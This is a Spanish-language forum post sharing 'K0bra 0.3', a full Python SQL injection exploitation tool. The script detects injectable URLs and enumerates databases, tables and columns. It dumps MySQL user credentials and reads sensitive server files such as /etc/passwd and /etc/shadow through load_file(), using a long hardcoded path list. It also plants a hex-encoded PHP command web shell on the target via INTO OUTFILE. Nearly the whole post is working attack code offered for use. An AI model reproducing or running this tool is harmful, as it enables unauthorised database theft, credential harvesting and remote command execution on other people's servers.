Foro de elhacker.net

Programación => Scripting => Mensaje iniciado por: BigBear en 3 Diciembre 2011, 16:35 pm



Título: [Python] K0bra 0.3
Publicado por: BigBear en 3 Diciembre 2011, 16:35 pm
Un completo scanner SQLI hecho en python

Las funciones son las siguientes

  • Comprobar vulnerabilidad
  • Buscar numero de columnas
  • Buscar automaticamente el numero para mostrar datos
  • Mostras tablas
  • Mostrar columnas
  • Mostrar bases de datos
  • Mostrar tablas de otra DB
  • Mostrar columnas de una tabla de otra DB
  • Mostrar usuarios de mysql.user
  • Buscar archivos usando load_file
  • Mostrar un archivo usando load_file
  • Mostrar valores
  • Mostrar informacion sobre la DB
  • Crear una shell usando outfile
  • Todo se guarda en logs ordenados
  • Manejo de control+c
Código
  1. #!usr/bin/python
  2. #k0bra 0.3 (C) Doddy Hackman 2011
  3.  
  4. import os,sys,urllib2,re,binascii
  5. from urlparse import urlparse
  6.  
  7. files = ["/etc/passwd","C:/xampp/htdocs/aca.txt","C:/xampp/htdocs/aca.txt","C:/xampp/htdocs/admin.php","C:/xampp/htdocs/leer.txt","../../../boot.ini","../../../../boot.ini","../../../../../boot.ini","../../../../../../boot.ini","/etc/shadow","/etc/shadow~","/etc/hosts","/etc/motd","/etc/apache/apache.conf","/etc/fstab","/etc/apache2/apache2.conf","/etc/apache/httpd.conf","/etc/httpd/conf/httpd.conf","/etc/apache2/httpd.conf","/etc/apache2/sites-available/default","/etc/mysql/my.cnf","/etc/my.cnf","/etc/sysconfig/network-scripts/ifcfg-eth0","/etc/redhat-release","/etc/httpd/conf.d/php.conf","/etc/pam.d/proftpd","/etc/phpmyadmin/config.inc.php","/var/www/config.php","/etc/httpd/logs/error_log","/etc/httpd/logs/error.log","/etc/httpd/logs/access_log","/etc/httpd/logs/access.log","/var/log/apache/error_log","/var/log/apache/error.log","/var/log/apache/access_log","/var/log/apache/access.log","/var/log/apache2/error_log","/var/log/apache2/error.log","/var/log/apache2/access_log","/var/log/apache2/access.log","/var/www/logs/error_log","/var/www/logs/error.log","/var/www/logs/access_log","/var/www/logs/access.log","/usr/local/apache/logs/error_log","/usr/local/apache/logs/error.log","/usr/local/apache/logs/access_log","/usr/local/apache/logs/access.log","/var/log/error_log","/var/log/error.log","/var/log/access_log","/var/log/access.log","/etc/group","/etc/security/group","/etc/security/passwd","/etc/security/user","/etc/security/environ","/etc/security/limits","/usr/lib/security/mkuser.default","/apache/logs/access.log","/apache/logs/error.log","/etc/httpd/logs/acces_log","/etc/httpd/logs/acces.log","/var/log/httpd/access_log","/var/log/httpd/error_log","/apache2/logs/error.log","/apache2/logs/access.log","/logs/error.log","/logs/access.log","/usr/local/apache2/logs/access_log","/usr/local/apache2/logs/access.log","/usr/local/apache2/logs/error_log","/usr/local/apache2/logs/error.log","/var/log/httpd/access.log","/var/log/httpd/error.log","/opt/lampp/logs/access_log","/opt/lampp/logs/error_log","/opt/xampp/logs/access_log","/opt/xampp/logs/error_log","/opt/lampp/logs/access.log","/opt/lampp/logs/error.log","/opt/xampp/logs/access.log","/opt/xampp/logs/error.log","C:\\ProgramFiles\\ApacheGroup\\Apache\\logs\\access.log","C:\\ProgramFiles\\ApacheGroup\\Apache\\logs\\error.log","/usr/local/apache/conf/httpd.conf","/usr/local/apache2/conf/httpd.conf","/etc/apache/conf/httpd.conf","/usr/local/etc/apache/conf/httpd.conf","/usr/local/apache/httpd.conf","/usr/local/apache2/httpd.conf","/usr/local/httpd/conf/httpd.conf","/usr/local/etc/apache2/conf/httpd.conf","/usr/local/etc/httpd/conf/httpd.conf","/usr/apache2/conf/httpd.conf","/usr/apache/conf/httpd.conf","/usr/local/apps/apache2/conf/httpd.conf","/usr/local/apps/apache/conf/httpd.conf","/etc/apache2/conf/httpd.conf","/etc/http/conf/httpd.conf","/etc/httpd/httpd.conf","/etc/http/httpd.conf","/etc/httpd.conf","/opt/apache/conf/httpd.conf","/opt/apache2/conf/httpd.conf","/var/www/conf/httpd.conf","/private/etc/httpd/httpd.conf","/private/etc/httpd/httpd.conf.default","/Volumes/webBackup/opt/apache2/conf/httpd.conf","/Volumes/webBackup/private/etc/httpd/httpd.conf","/Volumes/webBackup/private/etc/httpd/httpd.conf.default","C:\\ProgramFiles\\ApacheGroup\\Apache\\conf\\httpd.conf","C:\\ProgramFiles\\ApacheGroup\\Apache2\\conf\\httpd.conf","C:\\ProgramFiles\\xampp\\apache\\conf\\httpd.conf","/usr/local/php/httpd.conf.php","/usr/local/php4/httpd.conf.php","/usr/local/php5/httpd.conf.php","/usr/local/php/httpd.conf","/usr/local/php4/httpd.conf","/usr/local/php5/httpd.conf","/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf","/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf","/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf","/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php","/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php","/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php","/usr/local/etc/apache/vhosts.conf","/etc/php.ini","/bin/php.ini","/etc/httpd/php.ini","/usr/lib/php.ini","/usr/lib/php/php.ini","/usr/local/etc/php.ini","/usr/local/lib/php.ini","/usr/local/php/lib/php.ini","/usr/local/php4/lib/php.ini","/usr/local/php5/lib/php.ini","/usr/local/apache/conf/php.ini","/etc/php4.4/fcgi/php.ini","/etc/php4/apache/php.ini","/etc/php4/apache2/php.ini","/etc/php5/apache/php.ini","/etc/php5/apache2/php.ini","/etc/php/php.ini","/etc/php/php4/php.ini","/etc/php/apache/php.ini","/etc/php/apache2/php.ini","/web/conf/php.ini","/usr/local/Zend/etc/php.ini","/opt/xampp/etc/php.ini","/var/local/www/conf/php.ini","/etc/php/cgi/php.ini","/etc/php4/cgi/php.ini","/etc/php5/cgi/php.ini","c:\\php5\\php.ini","c:\\php4\\php.ini","c:\\php\\php.ini","c:\\PHP\\php.ini","c:\\WINDOWS\\php.ini","c:\\WINNT\\php.ini","c:\\apache\\php\\php.ini","c:\\xampp\\apache\\bin\\php.ini","c:\\NetServer\\bin\\stable\\apache\\php.ini","c:\\home2\\bin\\stable\\apache\\php.ini","c:\\home\\bin\\stable\\apache\\php.ini","/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini","/usr/local/cpanel/logs","/usr/local/cpanel/logs/stats_log","/usr/local/cpanel/logs/access_log","/usr/local/cpanel/logs/error_log","/usr/local/cpanel/logs/license_log","/usr/local/cpanel/logs/login_log","/var/cpanel/cpanel.config","/var/log/mysql/mysql-bin.log","/var/log/mysql.log","/var/log/mysqlderror.log","/var/log/mysql/mysql.log","/var/log/mysql/mysql-slow.log","/var/mysql.log","/var/lib/mysql/my.cnf","C:\\ProgramFiles\\MySQL\\MySQLServer5.0\\data\\hostname.err","C:\\ProgramFiles\\MySQL\\MySQLServer5.0\\data\\mysql.log","C:\\ProgramFiles\\MySQL\\MySQLServer5.0\\data\\mysql.err","C:\\ProgramFiles\\MySQL\\MySQLServer5.0\\data\\mysql-bin.log","C:\\ProgramFiles\\MySQL\\data\\hostname.err","C:\\ProgramFiles\\MySQL\\data\\mysql.log","C:\\ProgramFiles\\MySQL\\data\\mysql.err","C:\\ProgramFiles\\MySQL\\data\\mysql-bin.log","C:\\MySQL\\data\\hostname.err","C:\\MySQL\\data\\mysql.log","C:\\MySQL\\data\\mysql.err","C:\\MySQL\\data\\mysql-bin.log","C:\\ProgramFiles\\MySQL\\MySQLServer5.0\\my.ini","C:\\ProgramFiles\\MySQL\\MySQLServer5.0\\my.cnf","C:\\ProgramFiles\\MySQL\\my.ini","C:\\ProgramFiles\\MySQL\\my.cnf","C:\\MySQL\\my.ini","C:\\MySQL\\my.cnf","/etc/logrotate.d/proftpd","/www/logs/proftpd.system.log","/var/log/proftpd","/etc/proftp.conf","/etc/protpd/proftpd.conf","/etc/vhcs2/proftpd/proftpd.conf","/etc/proftpd/modules.conf","/var/log/vsftpd.log","/etc/vsftpd.chroot_list","/etc/logrotate.d/vsftpd.log","/etc/vsftpd/vsftpd.conf","/etc/vsftpd.conf","/etc/chrootUsers","/var/log/xferlog","/var/adm/log/xferlog","/etc/wu-ftpd/ftpaccess","/etc/wu-ftpd/ftphosts","/etc/wu-ftpd/ftpusers","/usr/sbin/pure-config.pl","/usr/etc/pure-ftpd.conf","/etc/pure-ftpd/pure-ftpd.conf","/usr/local/etc/pure-ftpd.conf","/usr/local/etc/pureftpd.pdb","/usr/local/pureftpd/etc/pureftpd.pdb","/usr/local/pureftpd/sbin/pure-config.pl","/usr/local/pureftpd/etc/pure-ftpd.conf","/etc/pure-ftpd/pure-ftpd.pdb","/etc/pureftpd.pdb","/etc/pureftpd.passwd","/etc/pure-ftpd/pureftpd.pdb","/var/log/pure-ftpd/pure-ftpd.log","/logs/pure-ftpd.log","/var/log/pureftpd.log","/var/log/ftp-proxy/ftp-proxy.log","/var/log/ftp-proxy","/var/log/ftplog","/etc/logrotate.d/ftp","/etc/ftpchroot","/etc/ftphosts","/var/log/exim_mainlog","/var/log/exim/mainlog","/var/log/maillog","/var/log/exim_paniclog","/var/log/exim/paniclog","/var/log/exim/rejectlog","/var/log/exim_rejectlog"]
  8.  
  9. def installer():
  10. try:
  11.  os.mkdir("logs",0777)
  12. except:
  13.  pass
  14.  
  15. def clean():
  16. if sys.platform=="win32":
  17.  os.system("cls")
  18. else:
  19.  os.system("clear")
  20.  
  21. def savefile(name,text):
  22. file = open(name,"a")
  23. file.write("\n"+text)
  24. file.close()
  25.  
  26. def gethost(test):
  27. return urlparse(test).netloc
  28.  
  29. def header() :
  30. print ""
  31. print ""
  32. print " @      @@   @   "          
  33. print "@@     @  @ @@      "      
  34. print " @ @@  @  @  @ @   @ @ @@@ "
  35. print " @ @   @  @  @@ @ @@@ @  @ "
  36. print " @@    @  @  @  @  @   @@@ "
  37. print " @ @   @  @  @  @  @  @  @ "
  38. print "@@@ @   @@   @@@  @@@ @@@@@"
  39. print ""
  40. print ""
  41.  
  42. def copyright() :
  43. print "\n\n(C) Doddy Hackman 2010\n"
  44.  
  45. def show() :
  46. print "\n[*] Sintax : ",sys.argv[0]," <web>\n"
  47.  
  48. def toma(web) :
  49. nave = urllib2.Request(web)
  50. nave.add_header('User-Agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5');
  51. op = urllib2.build_opener()
  52. return op.open(nave).read()
  53.  
  54. def bypass(bypass):
  55. if bypass == "--":
  56.  return("+","--")
  57. elif bypass == "/*":
  58.  return("/**/","/**/")
  59. else:
  60.  return("+","--")
  61.  
  62. def reiniciar():
  63. copyright()
  64. raw_input()
  65. sta()
  66.  
  67. def dumper(web,passx,table,col1,col2):
  68.  
  69. pass1,pass2 = bypass(passx)
  70. web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
  71. web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,"+col1+",0x4b30425241,0x4B3042524131,"+col2+",0x4B3042524131)))",web)
  72. code1 = toma(web1+pass1+"from"+pass1+table+pass2)
  73. print "\n\n[+] Searching values\n\n"
  74. if (re.findall("K0BRA(.*?)K0BRA",code1)):
  75.  numbers = re.findall("K0BRA(.*?)K0BRA",code1)
  76.  numbers = numbers[0]
  77.  savefile("logs/"+gethost(web)+".txt","")
  78.  savefile("logs/"+gethost(web)+".txt","[+] Values Found in table "+table+" : "+numbers+"\n")
  79.  print "[+] Values Found : ",numbers,"\n"
  80.  for counter in range(0,int(numbers)):
  81.   code2 = toma(web2+pass1+"from"+pass1+table+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
  82.   if (re.findall("K0BRA(.*?)K0BRA",code2)):
  83.    c1 = re.findall("K0BRA(.*?)K0BRA",code2)
  84.    c1 = c1[0]
  85.    c2 = re.findall("K0BRA1(.*?)K0BRA1",code2)
  86.    c2 = c2[0]
  87.    print "["+col1+"] : "+c1
  88.    print "["+col2+"] : "+c2+"\n"
  89.    savefile("logs/"+gethost(web)+".txt","["+col1+"] : "+c1)
  90.    savefile("logs/"+gethost(web)+".txt","["+col2+"] : "+c2+"\n")
  91. else:
  92.  print "[-] Not Found\n"
  93.  
  94. def mysqluser(web,passx):
  95. pass1,pass2 = bypass(passx)
  96. web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
  97. web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,Host,0x4b30425241,0x4B3042524131,User,0x4B3042524131,0x4B3042524132,Password,0x4B3042524132)))",web)
  98. code1 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2)
  99. print "\n\n[+] Searching mysql.user\n\n"
  100. if (re.findall("K0BRA(.*?)K0BRA",code1)):
  101.  numbers = re.findall("K0BRA(.*?)K0BRA",code1)
  102.  numbers = numbers[0]
  103.  print "[+] mysql.user : ON"
  104.  savefile("logs/"+gethost(web)+".txt","")
  105.  savefile("logs/"+gethost(web)+".txt","[+] mysql.user : ON")
  106.  savefile("logs/"+gethost(web)+".txt","[+] Users Found : "+numbers+"\n")
  107.  print "[+] Users Found : ",numbers,"\n"
  108.  for counter in range(0,int(numbers)):
  109.   code2 = toma(web2+pass1+"from"+pass1+"mysql.user"+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
  110.   if (re.findall("K0BRA(.*?)K0BRA",code2)):
  111.    host = re.findall("K0BRA(.*?)K0BRA",code2)
  112.    host = host[0]
  113.    user = re.findall("K0BRA1(.*?)K0BRA1",code2)
  114.    user = user[0]
  115.    passw = re.findall("K0BRA2(.*?)K0BRA2",code2)
  116.    passw = passw[0]
  117.    savefile("logs/"+gethost(web)+".txt","[Host] : "+host)
  118.    savefile("logs/"+gethost(web)+".txt","[User] : "+user)
  119.    savefile("logs/"+gethost(web)+".txt","[Pass] : "+passw+"\n")
  120.    print "[Host] : "+host
  121.    print "[User] : "+user
  122.    print "[Pass] : "+passw+"\n"    
  123. else:
  124.  print "[-] Not Found\n"
  125.  
  126.  
  127. def showcolumnsdb(web,db,table,passx):
  128. db2 = db
  129. table2 = table
  130. db = "0x"+str(binascii.hexlify(db))
  131. table = "0x"+str(binascii.hexlify(table))
  132. pass1,pass2 = bypass(passx)
  133. savefile("logs/"+gethost(web)+".txt","")
  134. web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
  135. web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))",web)
  136. code1 = toma(web1+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+table+pass1+"and"+pass1+"table_schema="+db+pass2)
  137. print "\n\n[+] Searching columns in DB\n\n"
  138. if (re.findall("K0BRA(.*?)K0BRA",code1)):
  139.  numbers = re.findall("K0BRA(.*?)K0BRA",code1)
  140.  numbers = numbers[0]
  141.  print "[+] information_schema : ON"
  142.  print "[+] Columns Found : ",numbers,"\n"
  143.  for counter in range(0,int(numbers)):
  144.   code2 = toma(web2+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+table+pass1+"and"+pass1+"table_schema="+db+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
  145.   if (re.findall("K0BRA(.*?)K0BRA",code2)):
  146.    column = re.findall("K0BRA(.*?)K0BRA",code2)
  147.    column = column[0]
  148.    savefile("logs/"+gethost(web)+".txt","[Column Found in table "+table2+" in DB "+table2+"] : "+column)
  149.    print "[Column Found] : "+column
  150. else:
  151.  print "[-] Not Found\n"
  152.  
  153.  
  154. def showtablesdb(web,db,passx):
  155. db2 = db
  156. db = "0x"+str(binascii.hexlify(db))
  157. pass1,pass2 = bypass(passx)
  158. savefile("logs/"+gethost(web)+".txt","")
  159. web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
  160. web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))",web)
  161. code1 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass1+"where"+pass1+"table_schema="+db+pass2)
  162. print "\n\n[+] Searching tables in DB\n\n"
  163. if (re.findall("K0BRA(.*?)K0BRA",code1)):
  164.  numbers = re.findall("K0BRA(.*?)K0BRA",code1)
  165.  numbers = numbers[0]
  166.  print "[+] information_schema : ON"
  167.  print "[+] Tables Found : ",numbers,"\n"
  168.  for counter in range(0,int(numbers)):
  169.   code2 = toma(web2+pass1+"from"+pass1+"information_schema.tables"+pass1+"where"+pass1+"table_schema="+db+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
  170.   if (re.findall("K0BRA(.*?)K0BRA",code2)):
  171.    table = re.findall("K0BRA(.*?)K0BRA",code2)
  172.    table = table[0]
  173.    print "[Table Found] : "+table
  174.    savefile("logs/"+gethost(web)+".txt","[Table Found in DB "+db2+"] : "+table)
  175. else:
  176.  print "[-] Not Found\n"
  177.  
  178. def showtables(web,passx):
  179. pass1,pass2 = bypass(passx)
  180. web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(table_name),0x4b30425241)))",web)
  181. web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))",web)
  182. code1 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2)
  183. print "\n\n[+] Searching tables\n\n"
  184. if (re.findall("K0BRA(.*?)K0BRA",code1)):
  185.  savefile("logs/"+gethost(web)+".txt","")
  186.  numbers = re.findall("K0BRA(.*?)K0BRA",code1)
  187.  numbers = numbers[0]
  188.  print "[+] information_schema : ON"
  189.  print "[+] Tables Found : ",numbers,"\n"
  190.  for counter in range(17,int(numbers)):
  191.   code2 = toma(web2+pass1+"from"+pass1+"information_schema.tables"+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
  192.   if (re.findall("K0BRA(.*?)K0BRA",code2)):
  193.    table = re.findall("K0BRA(.*?)K0BRA",code2)
  194.    table = table[0]
  195.    print "[Table Found] : "+table
  196.    savefile("logs/"+gethost(web)+".txt","[Table Found] : "+table)
  197. else:
  198.  print "[-] Not Found\n"
  199.  
  200. def showcolumns(tabla,web,passx):
  201. pass1,pass2 = bypass(passx)
  202. tabla2 = tabla
  203. tabla = "0x"+str(binascii.hexlify(tabla))
  204. web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(column_name),0x4b30425241)))",web)
  205. web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))",web)
  206. code1 = toma(web1+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tabla+pass2)
  207. print "\n\n[+] Searching columns\n\n"
  208. if (re.findall("K0BRA(.*?)K0BRA",code1)):
  209.  savefile("logs/"+gethost(web)+".txt","")
  210.  numbers = re.findall("K0BRA(.*?)K0BRA",code1)
  211.  numbers = numbers[0]
  212.  print "[+] information_schema : ON"
  213.  print "[+] Columns Found : ",numbers,"\n"
  214.  for counter in range(0,int(numbers)):
  215.   code2 = toma(web2+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tabla+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
  216.   if (re.findall("K0BRA(.*?)K0BRA",code2)):
  217.    column = re.findall("K0BRA(.*?)K0BRA",code2)
  218.    column = column[0]
  219.    print "[Column Found in table "+tabla2+"] : "+column
  220.    savefile("logs/"+gethost(web)+".txt","[Column Found in table "+tabla2+"] : "+column)
  221. else:
  222.  print "[-] Not Found\n"
  223.  
  224.  
  225. def showdbs(web,passx):
  226. pass1,pass2 = bypass(passx)
  227. web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
  228. web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,schema_name,0x4b30425241)))",web)
  229. code1 = toma(web1+pass1+"from"+pass1+"information_schema.schemata"+pass2)
  230. print "\n\n[+] Searching DBS\n\n"
  231. if (re.findall("K0BRA(.*?)K0BRA",code1)):
  232.  savefile("logs/"+gethost(web)+".txt","")
  233.  numbers = re.findall("K0BRA(.*?)K0BRA",code1)
  234.  numbers = numbers[0]
  235.  print "[+] information_schema : ON"
  236.  print "[+] DBS Found : ",numbers,"\n"
  237.  for counter in range(0,int(numbers)):
  238.   code2 = toma(web2+pass1+"from"+pass1+"information_schema.schemata"+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
  239.   if (re.findall("K0BRA(.*?)K0BRA",code2)):
  240.    db = re.findall("K0BRA(.*?)K0BRA",code2)
  241.    db = db[0]
  242.    print "[DB Found] : "+db
  243.    savefile("logs/"+gethost(web)+".txt","[DB Found] : "+db)
  244. else:
  245.  print "[-] Not Found\n"
  246.  
  247. def men():
  248. print "\n[+] Press any key to continue\n"
  249. raw_input()    
  250. menu(page,bypass)
  251.  
  252. def fuzz(web,bypassx):
  253. print "\n[+] Fuzzing files with load_file()\n"
  254. pass1,pass2 = bypass(bypassx)
  255. for archivos in files:
  256.  nombre = archivos
  257.  file = "0x"+str(binascii.hexlify(archivos))
  258.  web1 = re.sub("hackman","unhex(hex(concat(char(107,48,98,114,97),load_file("+file+"),char(107,48,98,114,97))))",web)
  259.  
  260.  code = toma(web1)
  261.  
  262.  if (re.findall("k0bra(.*?)k0bra",code,re.S)):
  263.   algo = re.findall("k0bra(.*?)k0bra",code,re.S)
  264.   print "\n[File Found] : ",nombre
  265.   print "\n[Source Start]\n"
  266.   print algo[0]
  267.   print "\n[Source End]"
  268.   savefile("logs/"+gethost(web)+".txt","\n[File Found] : "+nombre)
  269.   savefile("logs/"+gethost(web)+".txt","\n[Source Start]\n")
  270.   savefile("logs/"+gethost(web)+".txt",algo[0])
  271.   savefile("logs/"+gethost(web)+".txt","\n[Source End]")
  272. print "\n[+] Finished\n"
  273.  
  274. def fuzzfile(web,bypassx):
  275. pass1,pass2 = bypass(bypassx)
  276. archivos = raw_input("\n[File To load] : ")
  277. nombre = archivos
  278. file = "0x"+str(binascii.hexlify(archivos))
  279. web1 = re.sub("hackman","unhex(hex(concat(char(107,48,98,114,97),load_file("+file+"),char(107,48,98,114,97))))",web)
  280.  
  281. code = toma(web1)
  282.  
  283. if (re.findall("k0bra(.*?)k0bra",code,re.S)):
  284.  algo = re.findall("k0bra(.*?)k0bra",code,re.S)
  285.  print "\n\n[File Found] : ",nombre
  286.  print "\n[Source Start]\n"
  287.  print algo[0]
  288.  print "\n[Source End]"
  289.  savefile("logs/"+gethost(web)+".txt","\n[File Found] : "+nombre)
  290.  savefile("logs/"+gethost(web)+".txt","\n[Source Start]\n")
  291.  savefile("logs/"+gethost(web)+".txt",algo[0])
  292.  savefile("logs/"+gethost(web)+".txt","\n[Source End]")
  293. else:
  294.  print "\n\n[-] Error"
  295.  
  296. def into(web,passx):
  297. pass1,pass2 = bypass(passx)
  298. dira = raw_input("\n\n[Full Source Discloure] : ")
  299. diro = raw_input("\n[Directory to test] : ")
  300.  
  301. linea= "0x3c7469746c653e4d696e69205368656c6c20427920446f6464793c2f7469746c653e3c3f7068702069662028697373657428245f4745545b27636d64275d2929207b2073797374656d28245f4745545b27636d64275d293b7d3f3e"
  302. lugar = dira+"/cmd.php"
  303. lugardos = diro+"/cmd.php"
  304. webtest = "http://"+gethost(web)+lugardos
  305. web1 = re.sub("hackman",linea,web)
  306. formandoweb = web1+pass1+"into"+pass1+"outfile"+pass1+"'"+lugar+"'"+pass2
  307. toma(formandoweb)
  308. code = toma(webtest)
  309. if (re.findall("Mini Shell By Doddy",code)):
  310.  print "\n\n[shell up] : "+webtest
  311.  savefile("logs/"+gethost(web)+".txt","\n[shell up] : "+webtest)
  312. else:
  313.  print "\n\n[-] Error"
  314.  
  315.  
  316. def menu(page,bypass):
  317. clean()
  318. header()
  319. print "\n[+] Target : ",page,"\n"
  320. print "\n[information_schema]\n"
  321. print "1 - Show tables"
  322. print "2 - Show columns of the a table"
  323. print "3 - Show databases"
  324. print "4 - Show tables from the a DB"
  325. print "5 - Show columns from the a table of the DB"
  326. print "\n[mysql.user]\n"
  327. print "6 - Show users"
  328. print "\n[Others]\n"
  329. print "7 - Show details"
  330. print "8 - Dump data"
  331. print "9 - Fuzz Files with load_file"
  332. print "10 - Load files with load_file"
  333. print "11 - Create Shell"
  334. print "12 - Show log"
  335. print "13 - Change target"
  336. print "14 - Exit\n\n"
  337.  
  338.  
  339. try:
  340.  
  341.  op = input("[Option] : ")
  342.  
  343.  if op == 1:
  344.   showtables(page,bypass)
  345.   men()
  346.  elif op == 2:
  347.   table = raw_input("\n\n[Table] : ")
  348.   showcolumns(table,page,bypass)
  349.   men()
  350.  elif op == 3:
  351.   showdbs(page,bypass)
  352.   men()
  353.  elif op == 4:
  354.   db = raw_input("\n\n[DB] : ")
  355.   showtablesdb(page,db,bypass)
  356.   men()
  357.  elif op == 5:
  358.   db = raw_input("\n\n[DB] : ")
  359.   table = raw_input("\n\n[Table] : ")
  360.   showcolumnsdb(page,db,table,bypass)
  361.   men()
  362.  elif op == 6:
  363.   mysqluser(page,bypass)
  364.   men()
  365.  elif op == 7:
  366.   more(page,bypass)
  367.   men()
  368.  elif op == 8:
  369.  
  370.   table = raw_input("\n\n[Table] : ")
  371.   col1 = raw_input("\n\n[Column 1] : ")
  372.   col2 = raw_input("\n\n[Column 2] : ")
  373.   dumper(page,bypass,table,col1,col2)
  374.   men()
  375.  
  376.  elif op == 9:
  377.   fuzz(page,bypass)
  378.   men()
  379.  elif op == 10:
  380.   fuzzfile(page,bypass)
  381.   men()
  382.  elif op == 11:
  383.   into(page,bypass)
  384.   men()
  385.  elif op == 12:
  386.   os.system("start logs/"+gethost(page)+".txt")
  387.   menu(page,bypass)
  388.  elif op == 13:
  389.   sta()
  390.  elif op == 14:
  391.   sys.exit(1)  
  392.  else:
  393.   menu(page,bypass)
  394. except:
  395.  menu(page,bypass)
  396.  
  397. def more(web,passx):
  398. pass1,pass2 = bypass(passx)
  399. otraweb = web
  400. print "\n[+] Searching more data\n"
  401. hextest = "0x2f6574632f706173737764"
  402. web1 = re.sub("hackman","unhex(hex(concat(0x334d50335a3452,0x4b30425241,user(),0x4b30425241,database(),0x4b30425241,version(),0x4b30425241,0x334d50335a3452)))",web)
  403. web2 = re.sub("hackman","unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file("+hextest+"))))",otraweb)
  404. code0 = toma(web1+pass2)
  405. if (re.findall("3MP3Z4R(.*?)3MP3Z4R",code0)):
  406.  datax = re.findall("3MP3Z4R(.*?)3MP3Z4R",code0)
  407.  datar = re.split("K0BRA",datax[0])
  408.  savefile("logs/"+gethost(web)+".txt","")
  409.  print "[+] Username :",datar[1]
  410.  print "[+] Database :",datar[2]
  411.  print "[+] Version :",datar[3],"\n"
  412.  savefile("logs/"+gethost(web)+".txt","[+] Username : "+datar[1])
  413.  savefile("logs/"+gethost(web)+".txt","[+] Database : "+datar[2])
  414.  savefile("logs/"+gethost(web)+".txt","[+] Version : "+datar[3]+"\n")
  415. code1 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2)
  416. if (re.findall("K0BRA",code1)):
  417.   print "[+] mysql.user : on"
  418.   savefile("logs/"+gethost(web)+".txt","[+] mysql.user : on")
  419. code2 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2)
  420. if (re.findall("K0BRA",code2)):
  421.   print "[+] information_schema.tables : on"
  422.   savefile("logs/"+gethost(web)+".txt","[+] information_schema.tables : on")
  423. codetres = toma(web2)
  424. if (re.findall("ERTOR854",codetres)):
  425.  print "[+] load_file() : on"
  426.  savefile("logs/"+gethost(web)+".txt","[+] load_file() : on")
  427.  
  428. def findlength(web,passx):
  429. pass1,pass2 = bypass(passx)
  430. print "\n[+] Finding columns length"
  431. number = "unhex(hex(concat(0x4b30425241,1,0x4b30425241)))"
  432. for te in range(2,30):
  433.  number = str(number)+","+"unhex(hex(concat(0x4b30425241,"+str(te)+",0x4b30425241)))"
  434.  code = toma(web+"1"+pass1+"and"+pass1+"1=0"+pass1+"union"+pass1+"select"+pass1+number+pass2)
  435.  if (re.findall("K0BRA(.*?)K0BRA",code)):
  436.   numbers = re.findall("K0BRA(.*?)K0BRA",code)
  437.   print "[+] Column length :",te
  438.   print "[+] Numbers",numbers,"print data"
  439.   sql = ""
  440.   tex = te + 1
  441.   for sqlix in range(2,tex):
  442.    sql = str(sql)+","+str(sqlix)
  443.    sqli  = str(1)+sql
  444.   sqla = re.sub(numbers[0],"hackman",sqli)
  445.   savefile("logs/"+gethost(web)+".txt","\n[Target] : "+web+"1"+pass1+"and"+pass1+"1=0"+pass1+"union"+pass1+"select"+pass1+sqla+"\n")
  446.   menu(web+"1"+pass1+"and"+pass1+"1=0"+pass1+"union"+pass1+"select"+pass1+sqla,passx)
  447. print "[-] Length dont found\n"
  448. reiniciar()
  449.  
  450. def scan(web,passx):
  451. pass1,pass2 = bypass(passx)
  452. print "\n\n[+] Testing vulnerability"
  453. code = toma(web+"1"+pass1+"and"+pass1+"1=0"+pass2)
  454. codedos = toma(web+"1"+pass1+"and"+pass1+"1=1"+pass2)
  455.  
  456. if not code==codedos:
  457.  print "[+] SQLI Detected"
  458.  findlength(web,passx)
  459. else:
  460.  print "[-] Not Vulnerable"
  461.  op = raw_input("\n[+] Scan anyway y/n : ")
  462.  if op == "y":
  463.   findlength(web,passx)
  464.  elif op == "n":
  465.   reiniciar()
  466.  else:
  467.   reiniciar()
  468.  
  469. def sta():
  470.  
  471. clean()
  472. header()
  473.  
  474. web = raw_input("\n\n[Page] : ")
  475. bypasx = raw_input("\n\n[Bypass] : ")
  476. if (re.findall("hackman",web,re.I)):
  477.  menu(web,bypasx)
  478. else:
  479.  try:
  480.   scan(web,bypasx)
  481.  except:
  482.   print "\n[-] Web offline"
  483.   reiniciar()
  484.  
  485. installer()
  486. sta()
